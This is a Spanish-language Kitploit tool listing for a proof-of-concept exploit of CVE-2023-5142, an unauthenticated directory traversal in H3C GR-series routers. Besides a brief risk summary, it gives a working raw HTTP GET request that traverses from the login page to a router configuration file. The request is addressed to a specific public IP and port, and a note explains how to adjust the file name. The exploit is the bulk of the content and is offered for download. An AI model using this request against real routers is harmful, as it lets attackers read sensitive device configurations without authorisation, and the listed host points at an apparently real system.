Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-H3C-Report — Exploit PoC para CVE-2023-5142 dirigido a los routers de la serie GR de H3C con una vulnerabilidad de recorrido de directorios sin autenticación para extraer archivos de configuración sensibles. | Kitploit
Herramientas/GitHubGitHub/kuangxiaotu/cve-h3c-report
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónMala Configuración
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

Exploit PoC para CVE-2023-5142 dirigido a los routers de la serie GR de H3C con una vulnerabilidad de recorrido de directorios sin autenticación para extraer archivos de configuración sensibles.

Ver Repositorio
24hace 3 añosAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

La gestión del sistema de los routers de la serie GR de H3C tiene una vulnerabilidad de acceso no autorizado

Producto: Router serie GR

versión: todas

calificación: alto riesgo

sitio web: http://www.h3c.com/

Riesgos: Los atacantes pueden explotar esta vulnerabilidad para obtener información sensible de los routers mediante la construcción de paquetes de solicitud especiales que evitan la verificación de identidad.

principio: El router no autentica el acceso a directorios y archivos relacionados

exp:

Nota: Es necesario modificar el sufijo del nombre de archivo en el POC, por ejemplo, GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

Descargar herramienta